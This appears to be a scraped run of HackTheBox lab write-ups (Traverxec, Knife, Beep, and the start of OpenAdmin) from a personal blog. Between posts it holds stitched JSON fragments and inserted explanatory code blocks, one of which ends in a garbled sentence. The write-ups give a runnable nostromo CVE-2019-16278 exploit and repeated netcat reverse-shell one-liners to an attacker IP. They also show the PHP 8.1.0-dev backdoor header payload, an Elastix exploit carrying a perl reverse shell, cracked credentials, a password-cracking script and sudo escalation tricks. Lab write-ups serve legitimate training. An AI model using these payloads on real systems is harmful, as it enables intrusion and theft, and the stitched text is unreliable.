Detail: Directory Traversal in the function http_verify in nostromo nhttpd through 1.9.6 allows an attacker to achieve remote code execution via a crafted HTTP request.
We can walk up the path with "../" until we reach the binary /bin/sh and execute any command. In the request each ../ is written as .%0d./: the carriage return is stripped only after http_verify has looked for the traversal sequence, so the check never matches. The body of the request is then fed to /bin/sh on standard input.

The exploit is defined as follows (the function from 47837.py, shown here ported to Python 3 and completed with the receive helper the excerpt omitted, so it runs as written):

import socket
import sys

def connect(soc):
    # Helper omitted from the excerpt: read until the server closes the connection
    data = b''
    while True:
        chunk = soc.recv(4096)
        if not chunk:
            break
        data += chunk
    return data.decode(errors='replace')

def cve(target, port, cmd):
    soc = socket.socket()
    soc.connect((target, int(port)))
    # .%0d./ walks out of the docroot past http_verify's check until /bin/sh is reached;
    # the two echo lines eat the leading request bytes, then cmd is executed by sh.
    payload = 'POST /.%0d./.%0d./.%0d./.%0d./bin/sh HTTP/1.0\r\nContent-Length: 1\r\n\r\necho\necho\n{} 2>&1'.format(cmd)
    soc.send(payload.encode())  # Python 3 sockets take bytes
    receive = connect(soc)
    print(receive)

if __name__ == '__main__':
    cve(sys.argv[1], sys.argv[2], sys.argv[3])

┌──(kali㉿kali)-[~/htb/Traverxec]
└─$ python2 47837.py 10.10.10.165 80 "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|bash -i 2>&1|nc 10.10.16.6 1337 >/tmp/f"
[CVE-2019-16278 exploit banner]
--------------------------------------
┌──(kali㉿kali)-[~]
└─$ nc -lnvp 1337
listening on [any] 1337 ...
connect to [10.10.16.6] from (UNKNOWN) [10.10.10.165] 57934
bash: cannot set terminal process group (444): Inappropriate ioctl for device
bash: no job control in this shell
www-data@traverxec:/usr/bin$ python3 -c 'import pty;pty.spawn("/bin/bash")'
www-data@traverxec:/usr/bin$ export TERM=xterm
www-data@traverxec:/usr/bin$ ^Z
zsh: suspended  nc -lnvp 1337
┌──(kali㉿kali)-[~]
└─$ stty raw -echo; fg
[1]  + continued  nc -lnvp 1337
www-data@traverxec:/usr/bin$

david

user infos - nostromo conf

Digging through the directories of the web application "nostromo", we find a configuration file. It points to an authentication file, /var/nostromo/conf/.htpasswd, in which we find the password hash of the user david:

www-data@traverxec:/var/nostromo/conf$ cat nhttpd.conf
## MAIN [MANDATORY]

servername              traverxec.htb
serverlisten            *
serveradmin             david@traverxec.htb
serverroot              /var/nostromo
servermimes             conf/mimes
docroot                 /var/nostromo/htdocs
docindex                index.html

## LOGS [OPTIONAL]

logpid                  logs/nhttpd.pid

## SETUID [RECOMMENDED]

user                    www-data

## BASIC AUTHENTICATION [OPTIONAL]

htaccess                .htaccess
htpasswd                /var/nostromo/conf/.htpasswd

## ALIASES [OPTIONAL]

/icons                  /var/nostromo/icons

## HOMEDIRS [OPTIONAL]

homedirs                /home
homedirs_public         public_www

www-data@traverxec:/var/nostromo/conf$ cat /var/nostromo/conf/.htpasswd
david:$1$e7NfNpNi$A6nCwOTqrNR2oDuIKirRZ/

We use hashcat to crack the password (mode 500 is md5crypt, the $1$ format used here):

hashcat -m 500 hash.txt ~/wordlists/rockyou.txt -O -w 3 --show
$1$e7NfNpNi$A6nCwOTqrNR2oDuIKirRZ/:Nowonly4me

David's credentials?
david : Nowonly4me ?

It seems that a directory of david is reachable, as set out in the nostromo configuration: homedirs /home with homedirs_public public_www means /home/<user>/public_www is served by the web server. In it we discover a .tgz archive named backup-ssh-identity-files.tgz.

www-data@traverxec:/home/david$ cd public_www
www-data@traverxec:/home/david/public_www$ ls
index.html  protected-file-area
www-data@traverxec:/home/david/public_www$ cd protected-file-area/
www-data@traverxec:/home/david/public_www/protected-file-area$ ls
backup-ssh-identity-files.tgz
...
cd /tmp
tar -xzvf ...
...
www-data@traverxec:/tmp/home/david/.ssh$ ls
authorized_keys  id_rsa  id_rsa.pub

We find an SSH key pair.

ssh2john - cracking the SSH key file

We recover the passphrase of the SSH key. Password: hunter

┌──(kali㉿kali)-[~/htb/Traverxec]
└─$ ssh2john ./id_rsa
./id_rsa:$sshng$1$16$477EEFFBA56F9D283D349033D5D08C4F$1200$...
┌──(kali㉿kali)-[~/htb/Traverxec]
└─$ vim a
(the hash line above is saved into a file named "a")
┌──(kali㉿kali)-[~/htb/Traverxec]
└─$ john a --wordlist=/usr/share/wordlists/rockyou.txt
Using default input encoding: UTF-8
Loaded 1 password hash (SSH, SSH private key [RSA/DSA/EC/OPENSSH 32/64])
Cost 1 (KDF/cipher [0=MD5/AES 1=MD5/3DES 2=Bcrypt/AES]) is 0 for all loaded hashes
Cost 2 (iteration count) is 1 for all loaded hashes
Will run 2 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
hunter           (?)
1g 0:00:00:00 DONE (2025-01-22 09:34) 20.00g/s 2880p/s 2880c/s 2880C/s carolina..sandra
Use the "--show" option to display all of the cracked passwords reliably
Session completed.
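Both secrets so far (david's .htpasswd entry and the key passphrase) fell to rockyou. hashcat mode 500 is md5crypt, the $1$salt$hash scheme nostromo's .htpasswd uses. The block below is an added example, not part of the original writeup: md5crypt implemented in pure Python with a verify function and a small candidate loop, so a cracked result can be re-checked (or a short wordlist tried) with no cracker installed. The hash is the one from the .htpasswd above; the candidate list is constructed for the demo.

```python
import hashlib

# md5crypt's custom base64 alphabet and magic prefix (the "$1$" scheme of crypt(3))
ITOA64 = b"./0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz"
MAGIC = b"$1$"


def _to64(value, count):
    # Encode `count` 6-bit groups of `value`, least significant first
    out = bytearray()
    for _ in range(count):
        out.append(ITOA64[value & 0x3F])
        value >>= 6
    return bytes(out)


def md5crypt(password, salt):
    """Poul-Henning Kamp's md5crypt, as used by hashcat -m 500 and glibc crypt(3) for $1$."""
    pw, salt_b = password.encode(), salt.encode()[:8]
    alt = hashlib.md5(pw + salt_b + pw).digest()   # alternate sum MD5(pw + salt + pw)
    ctx = hashlib.md5(pw + MAGIC + salt_b)
    remaining = len(pw)                              # feed len(pw) bytes of alt
    while remaining > 0:
        ctx.update(alt[:min(16, remaining)])
        remaining -= 16
    bits = len(pw)                                   # one byte per bit of len(pw)
    while bits:
        ctx.update(b"\0" if bits & 1 else pw[:1])
        bits >>= 1
    final = ctx.digest()
    for i in range(1000):                            # key stretching with a data-dependent schedule
        c = hashlib.md5()
        c.update(pw if i & 1 else final)
        if i % 3:
            c.update(salt_b)
        if i % 7:
            c.update(pw)
        c.update(final if i & 1 else pw)
        final = c.digest()
    f = final                                        # byte shuffle, then custom base64
    enc = (_to64((f[0] << 16) | (f[6] << 8) | f[12], 4)
           + _to64((f[1] << 16) | (f[7] << 8) | f[13], 4)
           + _to64((f[2] << 16) | (f[8] << 8) | f[14], 4)
           + _to64((f[3] << 16) | (f[9] << 8) | f[15], 4)
           + _to64((f[4] << 16) | (f[10] << 8) | f[5], 4)
           + _to64(f[11], 2))
    return (MAGIC + salt_b + b"$" + enc).decode()


def verify(hash_str, candidate):
    """True if `candidate` produces `hash_str`; the salt is read from the hash itself."""
    parts = hash_str.split("$")                      # ['', '1', salt, digest]
    if len(parts) != 4 or parts[1] != "1":
        raise ValueError("not an md5crypt ($1$) hash")
    return md5crypt(candidate, parts[2]) == hash_str


def crack(hash_str, wordlist):
    """Return the first candidate that verifies, or None."""
    for word in wordlist:
        if verify(hash_str, word):
            return word
    return None


# Hash from the .htpasswd above; the candidate list is constructed for the demo
DAVID_HASH = "$1$e7NfNpNi$A6nCwOTqrNR2oDuIKirRZ/"
CANDIDATES = ["123456", "password", "traverxec", "Nowonly4me", "hunter"]

if __name__ == "__main__":
    print(crack(DAVID_HASH, CANDIDATES))
```

The 1000-round loop is the whole of md5crypt's cost, and it is fixed by the format; with rockyou that is still trivial on a GPU, which is why a $1$ entry in a web server's .htpasswd is worth little more than plaintext once the file is readable.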
David access - user flag

┌──(kali㉿kali)-[~/htb/Traverxec]
└─$ ssh david@traverxec.htb -i id_rsa
Enter passphrase for key 'id_rsa': hunter
Linux traverxec 4.19.0-6-amd64 #1 SMP Debian 4.19.67-2+deb10u1 (2019-09-20) x86_64
david@traverxec:~$ whoami
david

Bonus: remove the passphrase from the SSH key

┌──(kali㉿kali)-[~/htb/Traverxec]
└─$ ssh-keygen -p -f ./id_rsa
Enter old passphrase: hunter
Enter new passphrase (empty for no passphrase): (empty)
Enter same passphrase again: (empty)
Your identification has been saved with the new passphrase.

Privilege Escalation

server-stats.sh

In the script server-stats.sh we see a command that david can run as root without a password. It uses the journalctl binary to display logs.

david@traverxec:~/bin$ cat server-stats.sh
#!/bin/bash

cat /home/david/bin/server-stats.head
echo "Load: `/usr/bin/uptime`"
echo " "
echo "Open nhttpd sockets: `/usr/bin/ss -H sport = 80 | /usr/bin/wc -l`"
echo "Files in the docroot: `/usr/bin/find /var/nostromo/htdocs/ | /usr/bin/wc -l`"
echo " "
echo "Last 5 journal log lines:"
/usr/bin/sudo /usr/bin/journalctl -n5 -unostromo.service | /usr/bin/cat

exploit journalctl (GTFOBins)

On GTFOBins we find a way to exploit this binary. journalctl uses "less" to display its data, and less can be abused: typing "!/bin/sh" opens a shell from inside the program, which gives us root access since the pager inherits sudo's privileges. HOWEVER: when I was connected over SSH as david, journalctl did not run with less, or less stopped instantly, so it was impossible to perform the exploit...

After checking the solution, when connecting over SSH from the shell obtained as www-data, less is executed properly... and the exploit works. I think it is an issue with the environment of the shell used, which must be different, in the variables that select the pager used by journalctl.

A note on why this happens: journalctl only starts a pager when stdout is a terminal, and systemd runs less with LESS=FRSXMK; the F flag makes less exit immediately when the output fits on one screen, which five log lines usually do. Shrinking the terminal window to fewer rows than the output keeps the pager open long enough to type !/bin/sh (the truncated lines below are less chopping to the terminal width). The sudo command also has to be run on its own: the script pipes journalctl into cat, and with a pipe on stdout no pager is ever started.

https://gtfobins.github.io/gtfobins/journalctl/

david@traverxec:~/bin$ /usr/bin/sudo /usr/bin/journalctl -n5 -unostromo.service
-- Logs begin at Wed 2025-01-22 07:27:34 EST, end at Thu 2025-01-23 03:55:56 EST
Jan 22 08:09:14 traverxec su[1018]: pam_unix(su-l:auth): authentication failure;
Jan 22 08:09:16 traverxec su[1018]: FAILED SU (to root) www-data on pts/0
Jan 22 08:15:57 traverxec su[1055]: pam_unix(su:auth): authentication failure; l
Jan 22 08:15:59 traverxec su[1055]: FAILED SU (to david) www-data on pts/0
Jan 22 09:07:03 traverxec nhttpd[1201]: /../../../../bin/sh sent a bad cgi heade
!/bin/sh
# whoami
root
# cat /root/root.txt
ad59.....6f01
","date":"2025-01-23T00:00:00Z","permalink":"https://leopoldabgn.github.io/writeups/p/traverxec-htb/","title":"HTB | Traverxec"},{"content":" Machine name: Knife | OS: Linux | IP: 10.10.10.242 | Difficulty: Easy

Enumeration

nmap

$ nmap -sC -sV -An -T4 -vvv 10.10.10.242
PORT   STATE SERVICE REASON  VERSION
22/tcp open  ssh     syn-ack OpenSSH 8.2p1 Ubuntu 4ubuntu0.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   3072 be:54:9c:a3:67:c3:15:c3:64:71:7f:6a:53:4a:4c:21 (RSA)
| ssh-rsa AAAAB3NzaC1yc2EA...
|   256 bf:8a:3f:d4:06:e9:2e:87:4e:c9:7e:ab:22:0e:c0:ee (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2....
|   256 1a:de:a1:cc:37:ce:53:bb:1b:fb:2b:0b:ad:b3:f6:84 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1l....
80/tcp open  http    syn-ack Apache httpd 2.4.41 ((Ubuntu))
|_http-title: Emergent Medical Idea
| http-methods:
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.41 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Foothold

PHP 8.1.0-dev (RCE)

With Burp, we observe that the server announces PHP version 8.1.0-dev (X-Powered-By header). With searchsploit, we see that an RCE exists for this version: 8.1.0-dev is the backdoored development build from the March 2021 compromise of PHP's git server, not a regular release.

┌──(kali㉿kali)-[~]
└─$ searchsploit 8.1.0-dev
PHP 8.1.0-dev - 'User-Agentt' Remote Code Execution | php/webapps/49933.py

Exploit from searchsploit

We can use the Python script to exploit the vulnerability:

┌──(kali㉿kali)-[~/htb/Knife]
└─$ python3 49933.py
Enter the full host url:
http://knife.htb

Interactive shell is opened on http://knife.htb
Can't acces tty; job crontol turned off.
$ whoami
james
$ rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|bash -i 2>&1|nc 10.10.16.6 1337 >/tmp/f
------------------------------------
┌──(kali㉿kali)-[~]
└─$ nc -lnvp 1337
listening on [any] 1337 ...
connect to [10.10.16.6] from (UNKNOWN) [10.10.10.242] 60424
bash: cannot set terminal process group (1025): Inappropriate ioctl for device
bash: no job control in this shell
james@knife:/$ whoami
james

Exploit from Burp

The backdoor is triggered by an extra header named "User-Agentt" (two t's). If its value contains the string "zerodium", everything after that marker is evaluated as PHP code, so a value of zerodiumsystem('COMMAND_HERE'); simply runs system('COMMAND_HERE'); on the server:

## FROM BURP :
GET / HTTP/1.1
Host: knife.htb
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0
User-Agentt: zerodiumsystem('rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|bash -i 2>&1|nc 10.10.16.6 1337 >/tmp/f');
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: close
Upgrade-Insecure-Requests: 1
---------------------------------
┌──(kali㉿kali)-[~/htb/Knife]
└─$ nc -lnvp 1337
listening on [any] 1337 ...
connect to [10.10.16.6] from (UNKNOWN) [10.10.10.242] 60498
bash: cannot set terminal process group (1025): Inappropriate ioctl for device
bash: no job control in this shell
james@knife:/$ python3 -c "import pty;pty.spawn('/bin/bash')"
james@knife:/$ export TERM=xterm
james@knife:/$ ^Z
zsh: suspended  nc -lnvp 1337
┌──(kali㉿kali)-[~/htb/Knife]
└─$ stty raw -echo; fg
[1]  + continued  nc -lnvp 1337
james@knife:/$ whoami
james
james@knife:/$ cd
james@knife:~$ cat user.txt
4819.....4e49f

Privilege Escalation

knife binary exploit

With sudo -l, we observe that we can run the knife binary as root. On GTFOBins we quickly find an exploit for privilege escalation with this binary: knife exec evaluates arbitrary Ruby, which can spawn a shell, and under sudo that shell is root's.

Exact link of the page: https://gtfobins.github.io/gtfobins/knife/

james@knife:/home$ sudo -l
Matching Defaults entries for james on knife:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User james may run the following commands on knife:
    (root) NOPASSWD: /usr/bin/knife
james@knife:/home$ sudo knife exec -E 'exec "/bin/sh"'
# whoami
root
# c /root
# cat root.txt
3db8b.....ce60
","date":"2025-01-22T00:00:00Z","permalink":"https://leopoldabgn.github.io/writeups/p/knife-htb/","title":"HTB | Knife"},{"content":" Machine name: Beep | OS: Linux | IP: 10.10.10.7 | Difficulty: Easy

Enumeration

nmap

┌──(kali㉿kali)-[~]
└─$ sudo nmap -sS -sC -sV -An -vvv -T4 10.10.10.7
PORT      STATE SERVICE    REASON         VERSION
22/tcp    open  ssh        syn-ack ttl 63 OpenSSH 4.3 (protocol 2.0)
| ssh-hostkey:
|   1024 ad:ee:5a:bb:69:37:fb:27:af:b8:30:72:a0:f9:6f:53 (DSA)
| ssh-dss AAAAB3NzaC1kc3MAAACBAI04jN+Sn7/9f2k+5UteAWn8KKj3FRGuF4LyeDmo/xxuHgSsdCjYuWtNS8m7stqgNH5edUu8vZ0pzF/quX5kphWg/UOz9weGeGyzde5lfb8epRlTQ2kfbP00l+kq9ztuWaXOsZQGcSR9iKE4lLRJhRCLYPaEbuxKnYz4WhAv4yD5AAAAFQDXgQ9BbvoxeDahe/ksAac2ECqflwAAAIEAiGdIue6mgTfdz/HikSp8DB6SkVh4xjpTTZE8L/HOVpTUYtFYKYj9eG0W1WYo+lGg6SveATlp3EE/7Y6BqdtJNm0RfR8kihoqSL0VzKT7myerJWmP2EavMRPjkbXw32fVBdCGjBqMgDl/QSEn2NNDu8OAyQUVBEHrE4xPGI825qgAAACANnqx2XdVmY8agjD7eFLmS+EovCIRz2+iE+5chaljGD/27OgpGcjdZNN+xm85PPFjUKJQuWmwMVTQRdza6TSp9vvQAgFh3bUtTV3dzDCuoR1D2Ybj9p/bMPnyw62jgBPxj5lVd27LTBi8IAH2fZnct7794Y3Ge+5r4Pm8Qbrpy68=
|   2048 bc:c6:73:59:13:a1:8a:4b:55:07:50:f6:65:1d:6d:0d (RSA)
|_ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAQEA4SXumrUtyO/pcRLwmvnF25NG/ozHsxSVNRmTwEf7AYubgpAo4aUuvhZXg5iymwTcZd6vm46Y+TX39NQV/yT6ilAEtLbrj1PLjJl+UTS8HDIKl6QgIb1b3vuEjbVjDj1LTq0Puzx52Es0/86WJNRVwh4c9vN8MtYteMb/dE2Azk0SQMtpBP+4Lul4kQrNwl/qjg+lQ7XE+NU7Va22dpEjLv/TjHAKImQu2EqPsC99sePp8PP5LdNbda6KHsSrZXnK9hqpxnwattPHT19D94NHVmMHfea9gXN3NCI3NVfDHQsxhqVtR/LiZzpbKHldFU0lfZYH1aTdBfxvMLrVhasZcw==
25/tcp    open  smtp       syn-ack ttl 63 Postfix smtpd
|_smtp-commands: beep.localdomain, PIPELINING, SIZE 10240000, VRFY, ETRN, ENHANCEDSTATUSCODES, 8BITMIME, DSN
80/tcp    open  http       syn-ack ttl 63 Apache httpd 2.2.3
|_http-server-header: Apache/2.2.3 (CentOS)
| http-methods:
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-title: Did not follow redirect to https://10.10.10.7/
110/tcp   open  pop3       syn-ack ttl 63 Cyrus pop3d 2.3.7-Invoca-RPM-2.3.7-7.el5_6.4
|_pop3-capabilities: RESP-CODES TOP APOP LOGIN-DELAY(0) USER PIPELINING IMPLEMENTATION(Cyrus POP3 server v2) STLS AUTH-RESP-CODE UIDL EXPIRE(NEVER)
111/tcp   open  rpcbind    syn-ack ttl 63 2 (RPC #100000)
| rpcinfo:
|   program version    port/proto  service
|   100000  2            111/tcp   rpcbind
|   100000  2            111/udp   rpcbind
|   100024  1            790/udp   status
|_  100024  1            793/tcp   status
143/tcp   open  imap       syn-ack ttl 63 Cyrus imapd 2.3.7-Invoca-RPM-2.3.7-7.el5_6.4
|_imap-capabilities: Completed MAILBOX-REFERRALS IMAP4 RIGHTS=kxte QUOTA OK ANNOTATEMORE BINARY SORT=MODSEQ X-NETSCAPE LIST-SUBSCRIBED UIDPLUS LISTEXT IMAP4rev1 CHILDREN STARTTLS IDLE NAMESPACE SORT CONDSTORE ID ACL CATENATE NO RENAME THREAD=REFERENCES LITERAL+ URLAUTHA0001 MULTIAPPEND THREAD=ORDEREDSUBJECT ATOMIC UNSELECT
443/tcp   open  ssl/http   syn-ack ttl 63 Apache httpd 2.2.3 ((CentOS))
| http-methods:
|_  Supported Methods: GET HEAD POST OPTIONS
| http-robots.txt: 1 disallowed entry
|_/
|_http-favicon: Unknown favicon MD5: 80DCC71362B27C7D0E608B0890C05E9F
|_ssl-date: 2025-01-20T14:02:51+00:00; +7m26s from scanner time.
|_http-title: Elastix - Login page
|_http-server-header: Apache/2.2.3 (CentOS)
| ssl-cert: Subject: commonName=localhost.localdomain/organizationName=SomeOrganization/stateOrProvinceName=SomeState/countryName=--/organizationalUnitName=SomeOrganizationalUnit/localityName=SomeCity/emailAddress=root@localhost.localdomain
| Issuer: commonName=localhost.localdomain/organizationName=SomeOrganization/stateOrProvinceName=SomeState/countryName=--/organizationalUnitName=SomeOrganizationalUnit/localityName=SomeCity/emailAddress=root@localhost.localdomain
| Public Key type: rsa
| Public Key bits: 1024
| Signature Algorithm: sha1WithRSAEncryption
| Not valid before: 2017-04-07T08:22:08
| Not valid after:  2018-04-07T08:22:08
| MD5:   621a:82b6:cf7e:1afa:5284:1c91:60c8:fbc8
| SHA-1: 800a:c6e7:065e:1198:0187:c452:0d9b:18ef:e557:a09f
| -----BEGIN CERTIFICATE-----
| MIIEDjCCA3egAwIBAgICfVUwDQYJKoZIhvcNAQEFBQAwgbsxCzAJBgNVBAYTAi0t
| MRIwEAYDVQQIEwlTb21lU3RhdGUxETAPBgNVBAcTCFNvbWVDaXR5MRkwFwYDVQQK
| ExBTb21lT3JnYW5pemF0aW9uMR8wHQYDVQQLExZTb21lT3JnYW5pemF0aW9uY...
|_-----END CERTIFICATE-----
993/tcp   open  ssl/imap   syn-ack ttl 63 Cyrus imapd
|_imap-capabilities: CAPABILITY
995/tcp   open  pop3       syn-ack ttl 63 Cyrus pop3d
3306/tcp  open  mysql      syn-ack ttl 63 MySQL (unauthorized)
4445/tcp  open  upnotifyp? syn-ack ttl 63
10000/tcp open  http       syn-ack ttl 63 MiniServ 1.570 (Webmin httpd)
|_http-favicon: Unknown favicon MD5: 74F7F6F633A027FA3EA36F05004C9341
| http-methods:
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-title: Site doesn't have a title (text/html; Charset=iso-8859-1).

Foothold

Elastix - RCE

We find an exploit for Elastix on GitHub. In the code provided by searchsploit, the extension used to place the call through the PHP page is 1000. We had to work out that the right extension on this machine is 233; for other values the call does not go through and the page returns an error.
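What the exploit script actually abuses: recordings/misc/callme_page.php takes the callmenum parameter and writes it, unescaped, into the Originate action it sends to the Asterisk Manager Interface. The URL-encoded %0D%0A pairs inject new lines, so the attacker appends an "Application: system" field and a "Data:" line carrying a perl reverse shell, and the extension (233 here) only has to be one Asterisk will actually dial. The block below is an added example, not the exploit's or Elastix's code: it decodes such a callmenum value to show the smuggled lines, next to the validation the endpoint should have applied (a dial-plan extension is digits only, so anything else, CR/LF included, is rejected). The sample value is built from the exploit URL with a constructed listener address.

```python
import re
from urllib.parse import unquote

# callmenum value as sent by the exploit, with a constructed listener address
# (10.10.16.2:1337 is an assumption for the demo, not a live host).
EXPLOIT_CALLMENUM = (
    "233@from-internal/n%0D%0AApplication:%20system%0D%0AData:%20perl%20-MIO%20-e%20"
    "%27%24p%3dfork%3bexit%2cif%28%24p%29%3b%24c%3dnew%20IO%3a%3aSocket%3a%3aINET%28"
    "PeerAddr%2c%2210.10.16.2%3a1337%22%29%3bSTDIN-%3efdopen%28%24c%2cr%29%3b"
    "%24%7e-%3efdopen%28%24c%2cw%29%3bsystem%24%5f%20while%3c%3e%3b%27%0D%0A%0D%0A"
)


def injected_ami_lines(callmenum):
    """Decode callmenum as the PHP side does ($_GET is already URL-decoded) and split
    on CRLF. The first piece is what the page meant to dial; every further non-empty
    line is a field the attacker smuggled into the AMI Originate action."""
    decoded = unquote(callmenum)
    first, *rest = decoded.split("\r\n")
    return first, [line for line in rest if line]


def is_safe_callmenum(callmenum):
    """The check the endpoint lacked: a dial-plan extension is a short run of digits.
    Validating the decoded value rejects CR/LF, '@', '/' and percent-encoded
    leftovers before anything is written to the manager interface."""
    return re.fullmatch(r"\d{1,10}", unquote(callmenum)) is not None


if __name__ == "__main__":
    ext, smuggled = injected_ami_lines(EXPLOIT_CALLMENUM)
    print("dialed:", ext)
    for line in smuggled:
        print("injected:", line)
    print("accepted by validator:", is_safe_callmenum(EXPLOIT_CALLMENUM))
```

Rejecting on the decoded value matters: the same allow-list applied to the raw query string would pass "233" but also miss nothing, whereas applied after decoding it catches a double-encoded %250D as well, since one round of decoding leaves "%0D", which is not a digit.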
Ensuite, on peut exploiter la RCE.\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 $ cat final_exploit.py #exploit modified by infosecjunky #https://infosecjunky.com import urllib2 import ssl rhost=\u0026#34;10.10.10.7\u0026#34; lhost=\u0026#34;10.10.16.2\u0026#34; lport=1337 extension=\u0026#34;233\u0026#34; ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1) ctx.check_hostname = False ctx.verify_mode = ssl.CERT_NONE # Reverse shell payload url = \u0026#39;https://\u0026#39;+str(rhost)+\u0026#39;/recordings/misc/callme_page.php?action=c\u0026amp;callmenum=\u0026#39;+str(extension)+\u0026#39;@from-internal/n%0D%0AApplication:%20system%0D%0AData:%20perl%20-MIO%20-e%20%27%24p%3dfork%3bexit%2cif%28%24p%29%3b%24c%3dnew%20IO%3a%3aSocket%3a%3aINET%28PeerAddr%2c%22\u0026#39;+str(lhost)+\u0026#39;%3a\u0026#39;+str(lport)+\u0026#39;%22%29%3bSTDIN-%3efdopen%28%24c%2cr%29%3b%24%7e-%3efdopen%28%24c%2cw%29%3bsystem%24%5f%20while%3c%3e%3b%27%0D%0A%0D%0A\u0026#39; urllib2.urlopen(url,context=ctx) # On Elastix, once we have a shell, we can escalate to root: # root@bt:~# nc -lvp 443 # listening on [any] 443 ... # connect to [172.16.254.223] from voip [172.16.254.72] 43415 # id # uid=100(asterisk) gid=101(asterisk) # sudo nmap --interactive # Starting Nmap V. 
4.11 ( http://www.insecure.org/nmap/ ) # Welcome to Interactive Mode -- press h \u0026lt;enter\u0026gt; for help # nmap\u0026gt; !sh # id # uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel) Privilege Escalation nmap as root Sur : https://gtfobins.github.io/gtfobins/nmap/\nOn trouve comment exploiter les droits root sur la commande nmap pour obtenir un shell privilégié.\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 sudo -l Matching Defaults entries for asterisk on this host: env_reset, env_keep=\u0026#34;COLORS DISPLAY HOSTNAME HISTSIZE INPUTRC KDEDIR LS_COLORS MAIL PS1 PS2 QTDIR USERNAME LANG LC_ADDRESS LC_CTYPE LC_COLLATE LC_IDENTIFICATION LC_MEASUREMENT LC_MESSAGES LC_MONETARY LC_NAME LC_NUMERIC LC_PAPER LC_TELEPHONE LC_TIME LC_ALL LANGUAGE LINGUAS _XKB_CHARSET XAUTHORITY\u0026#34; User asterisk may run the following commands on this host: (root) NOPASSWD: /sbin/shutdown (root) NOPASSWD: /usr/bin/nmap (root) NOPASSWD: /usr/bin/yum (root) NOPASSWD: /bin/touch (root) NOPASSWD: /bin/chmod (root) NOPASSWD: /bin/chown (root) NOPASSWD: /sbin/service (root) NOPASSWD: /sbin/init (root) NOPASSWD: /usr/sbin/postmap (root) NOPASSWD: /usr/sbin/postfix (root) NOPASSWD: /usr/sbin/saslpasswd2 (root) NOPASSWD: /usr/sbin/hardware_detector (root) NOPASSWD: /sbin/chkconfig (root) NOPASSWD: /usr/sbin/elastix-helper sudo /usr/bin/nmap --interactive Starting Nmap V. 4.11 ( http://www.insecure.org/nmap/ ) Welcome to Interactive Mode -- press h \u0026lt;enter\u0026gt; for help nmap\u0026gt; !sh whoami root cat /root/root.txt 19d01.....0b5f cat /home/*/user.txt c3a2.....2248 ","date":"2025-01-20T00:00:00Z","permalink":"https://leopoldabgn.github.io/writeups/p/beep-htb/","title":"HTB | Beep"},{"content":" Machine name OS IP Difficulty OpenAdmin Linux 10.10.10.171 Easy Users 1 jimmy:n1nj4W4rri0R! 
Enumeration\nnmap\n$ nmap -sS -sC -sV -An -p22,80 -vvv 10.10.10.171\nPORT   STATE SERVICE REASON         VERSION\n22/tcp open  ssh     syn-ack ttl 63 OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)\n| ssh-hostkey: \n|   2048 4b:98:df:85:d1:7e:f0:3d:da:48:cd:bc:92:00:b7:54 (RSA)\n| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCcVHOWV8MC41kgTdwiBIBmUrM8vGHUM2Q7+a0LCl9jfH3bIpmuWnzwev97wpc8pRHPuKfKm0c3iHGII+cKSsVgzVtJfQdQ0j/GyDcBQ9s1VGHiYIjbpX30eM2P2N5g2hy9ZWsF36WMoo5Fr+mPNycf6Mf0QOODMVqbmE3VVZE1VlX3pNW4ZkMIpDSUR89JhH+PHz/miZ1OhBdSoNWYJIuWyn8DWLCGBQ7THxxYOfN1bwhfYRCRTv46tiayuF2NNKWaDqDq/DXZxSYjwpSVelFV+vybL6nU0f28PzpQsmvPab4PtMUb0epaj4ZFcB1VVITVCdBsiu4SpZDdElxkuQJz\n|   256 dc:eb:3d:c9:44:d1:18:b1:22:b4:cf:de:bd:6c:7a:54 (ECDSA)\n| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBHqbD5jGewKxd8heN452cfS5LS/VdUroTScThdV8IiZdTxgSaXN1Qga4audhlYIGSyDdTEL8x2tPAFPpvipRrLE=\n|   256 dc:ad:ca:3c:11:31:5b:6f:e6:a4:89:34:7c:9b:e5:50 (ED25519)\n|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIBcV0sVI0yWfjKsl7++B9FGfOVeWAIWZ4YGEMROPxxk4\n80/tcp open  http    syn-ack ttl 63 Apache httpd 2.4.29 ((Ubuntu))\n| http-methods: \n|_  Supported Methods: GET POST OPTIONS HEAD\n|_http-title: Apache2 Ubuntu Default Page: It works\n|_http-server-header: Apache/2.4.29 (Ubuntu)\nFoothold\ndirsearch : openadmin.htb\n$ dirsearch -u http://openadmin.htb\n/usr/lib/python3/dist-packages/dirsearch/dirsearch.py:23: DeprecationWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html\n  from pkg_resources import DistributionNotFound, VersionConflict\n\n  _|. _ _  _  _  _ _|_    